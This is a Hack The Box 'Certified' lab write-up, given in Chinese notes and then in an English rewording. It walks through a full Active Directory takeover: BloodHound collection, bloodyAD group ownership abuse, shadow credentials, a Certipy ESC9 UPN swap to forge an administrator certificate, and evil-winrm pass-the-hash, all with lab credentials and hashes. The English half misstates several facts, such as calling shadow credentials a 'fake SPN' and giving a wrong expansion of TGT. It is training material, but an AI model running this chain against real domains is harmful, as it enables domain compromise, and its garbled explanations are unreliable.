htb certified
Information Gathering
# Nmap 7.98 scan initiated Fri Jan 2 03:47:32 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.14s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-02 10:17:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after: 2105-05-23T21:04:20
| MD5: 3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1: c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/2%Time=69573FE9%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-02T10:18:15
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h29m38s, deviation: 0s, median: 6h29m38s
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 2 03:49:17 2026 -- 1 IP address (1 host up) scanned in 105.83 secondsVulnerability Analysis
judith.mader:judith09
首先校准时间
➜ Certified sudo date -s "$(nmap -p 445 10.10.11.41 --script smb2-time | grep 'date: 2'|cut -d ' ' -f 5)"
Fri Jan 2 10:29:36 AM UTC 2026bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -dc 'dc01.certified.htb' -c all -ns 10.10.11.41 --zip 收集域信息
judith.mader user WriteOwner Management group GernericWrite Management_SVC user GenericAll CA_OPERATOR user
Exploitation (User Flag)
# 将management组的所有者改为用户judith.mader
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' set owner 'management' judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management
# 给judith.mader权限
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add genericAll 'management' judith.mader
[+] judith.mader has now GenericAll on management
# 将judith.mader纳入该组
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add groupMember 'management' judith.mader
[+] judith.mader added to management
# 使用 ldap 模块查询 judith.mader 所属的组
nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --query "(sAMAccountName=judith.mader)" "memberOf"此时我们就可以利用GernericWrite Management_SVC user
# 给用户Management_SVC设置虚假的SPN
➜ Certified bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add shadowCredentials 'management_svc'
[+] KeyCredential generated with following sha256 of RSA key: 27e6dac6b3bf03d0ae9997665206b05b54de55bd629b95d8acd1f3e090c4248f
[+] TGT stored in ccache file management_svc_Df.ccache
NT: a091c1832bcdd4677c28b5a6a1295584Privilege Escalation (Root Flag)
➜ Certified certipy find -u ca_operator@certified.htb -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -vulnerable -stdout得到ESC9
更改upn为administrator
➜ Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : administrator
[*] Successfully updated 'ca_operator'申请证书
➜ Certified certipy req -u CA_OPERATOR -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'CertifiedAuthentication' -debug
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'还原upn
➜ Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'CA_OPERATOR@certified.htb' -user 'CA_OPERATOR' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : CA_OPERATOR@certified.htb
[*] Successfully updated 'ca_operator'进行身份验证
➜ Certified certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34➜ Certified evil-winrm -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -i certified.htb
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
25313f415eb17c6f9856e10e820d9769Lessons Learned
htb Certified
Information Gathering
# Nmap 7.98 scan initiated on Friday, January 2, 2026, at 03:47:32, with the following command:
`/usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.41`
**Nmap scan report for 10.10.11.41:**
The host is online (latency: 0.14 seconds).
988 TCP ports were filtered out due to no response.
**Port Details:**
| Port | Status | Service | Version |
|-------------|-------------|------------------|----------------------------------|
| 53/tcp | Open | domain | (Generic DNS response: NOTIMP) |
| 88/tcp | Open | kerberos-sec | Microsoft Windows Kerberos |
| 135/tcp | Open | msrpc | Microsoft Windows RPC |
| 139/tcp | Open | netbios-ssn | Microsoft Windows netbios-ssn |
| 389/tcp | Open | ldap | Microsoft Windows Active Directory LDAP |
| | | _SSL-Cert: | Subject: … |
| | | … | Issuer: … |
| | | Public Key type: rsa | Public Key bits: 2048 |
| | | Signature Algorithm: sha256WithRSAEncryption | … |
| | | … | Valid until: 2025-06-11T21:04:20 |
| | | … | MD5: … |
| | | … | SHA-1: … |
| | | … | SHA-256: … |
| | | … | SSL Date: 2026-01-02T10:18:55+00:00 |
| 445/tcp | Open | microsoft-ds? | … |
| 464/tcp | Open | kpasswd5? | … |
| 593/tcp | Open | ncacn_http | Microsoft Windows RPC over HTTP 1.0 |
| 636/tcp | Open | ssl/ldap | Microsoft Windows Active Directory LDAP |
| | | _SSL-Cert: | Subject: … |
| | | … | Issuer: … |
| | | Public Key type: rsa | Public Key bits: 2048 |
| | | Signature Algorithm: sha256WithRSAEncryption | … |
| | | … | Valid until: 2025-06-11T21:04:20 |
| | | MD5: … | SHA-1: … |
| | | SHA-256: … | … |
| 3268/tcp | Open | ldap | Microsoft Windows Active Directory LDAP |
| | | _SSL-Cert: | Subject: … |
| | | … | Issuer: … |
| | | Public Key type: rsa | Public Key bits: 2048 |
| | | Signature Algorithm: sha256WithRSAEncryption | … |
| | | … | Valid until: 2025-06-11T21:04:20 |
| | | MD5: … | SHA-1: … |
| | | SHA-256: … | … |
| 5985/tcp | Open | http | Microsoft HTTPAPI (SSDP/UPnP) |
| | _HTTP-Title: Not Found | _HTTP-Server-Header: Microsoft-HTTPAPI/2.0 |
| 1 service remains unrecognized despite data being returned. If you know the service/version, please submit details at:
`https://nmap.org/cgi-bin/submit.cgi?new-service`
**Note:** OSScan results may be unreliable due to the inability to find at least one open or closed port.
**Device Type:** General-purpose.
**OS Guesses:** Microsoft Windows 2019 (97%), Microsoft Windows 10 (91%).
**No exact OS match found (test conditions were not ideal).**
**TCP Sequence Prediction Difficulty:** 259.
**IP ID Sequence Generation:** Incremental.
**Service Information:** Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows.
Host script results:
| smb2-time:
| Date: 2026-01-02T10:18:15
|_ Start_date: N/A
| smb2-security-mode:
| Version: 3.1.1
|_ Message signing is enabled and required
|_ Clock skew: Mean: 6h29m38s, Deviation: 0s, Median: 6h29m38s
Data files were read from: /usr/share/nmap
OS and service detection was performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap completed on Fri Jan 2 2026 at 03:49:17 – 1 IP address (1 host up) was scanned in 105.83 seconds.Vulnerability Analysis
judith.mader:judith09
First, let’s calibrate the time:
➜ Certified sudo date -s "$(nmap -p 445 10.10.11.41 --script smb2-time | grep 'date: 2'|cut -d ' ' -f 5)"
Fri Jan 2 10:29:36 AM UTC 2026Use bloodhound-python to collect domain information:
bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -dc 'dc01.certified.htb' -c all -ns 10.10.11.41 --zip
![[image 125.png]]User information:
judith.mader belongs to the Management group, and also has the GernericWrite and CA_operator roles, as well as the GenericAll role.
Exploitation (User Flag)
# Change the owner of the `management` group to `judith.mader`
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' set owner 'management' judith.mader
[+] The previous owner (S-1-5-21-729746778-2675978091-3820388244-512) has been replaced by judith.mader as the owner of the `management` group.
# Grant `judith.mader` the `GenericAll` role within the `management` group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add genericAll 'management' judith.mader
[+] judith.mader now has the `GenericAll` role within the `management` group.
# Add `judith.mader` as a member of the `management` group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add groupMember 'management' judith.mader
[+] judith.mader has been added to the `management` group.
# Use the LDAP module to query the groups to which judith.mader belongs
nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --query "(sAMAccountName=judith.mader)" "memberOf"Now we can utilize the GernericWrite role associated with the Management_SVC user:
# Set a fake SPN (Service Principal Name) for the `Management_SVC` user
➜ Certified bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add shadowCredentials 'management_svc'
[+] A new shadow credential was generated; the RSA key is represented by the following SHA256 hash: 27e6dac6b3bf03d0ae9997665206b05b54de55bd629b95d8acd1f3e090c4248f.
[+] The new credential is stored in the `ccache` file (`management_svc_Df.ccache`).Privilege Escalation (Root Flag)
➜ Certified certipy find -u ca_operator@certified.htb -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -vulnerable -stdoutThis command is used to identify vulnerable targets within the Certipy system.
Result: ESC9
Changing the UPN to ‘administrator’:
➜ Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)This command updates the username of the user ca_operator to administrator.
Requesting a new certificate:
➜ Certified certipy req -u CA_operator -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'CertifiedAuthentication' -debugThis command requests a new certificate for the user ca_operator.
Saving the certificate and private key:
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Certificate and private key have been saved to 'administrator.pfx'Restoring the UPN to the original value:
➜ Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'CA_operator@certified.htb' -user 'ca_operator' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)This command changes the UPN of the user ca_operator back to its original value, CA_operator@certified.htb.
Performing authentication:
➜ Certified certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)This command authenticates the user ca_operator using the newly requested certificate.
[] Certificate identities: [] SAN UPN: ‘administrator’ [] Using principal: ‘administrator@certified.htb’ [] Attempting to obtain the TGT (Trusted Ticket Granting)… [] TGT obtained. [] Credential cache is being saved to ‘administrator.ccache’. [] Credential cache has been successfully written to ‘administrator.ccache’. [] Attempting to retrieve the NT hash for ‘administrator’. [*] NT hash for ‘administrator@certified.htb’ obtained: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34’
```bash
➜ Certified evil-winrm -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -i certified.htb
Evil-WinRM shell v3.9
Warning: Remote path completion is disabled due to a limitation in Ruby: the method `quoting_detection_proc` is not defined for the module `Reline`.
For more information, visit the Evil-WinRM GitHub repository: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Connecting to the remote endpoint...
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
25313f415eb17c6f9856e10e820d9769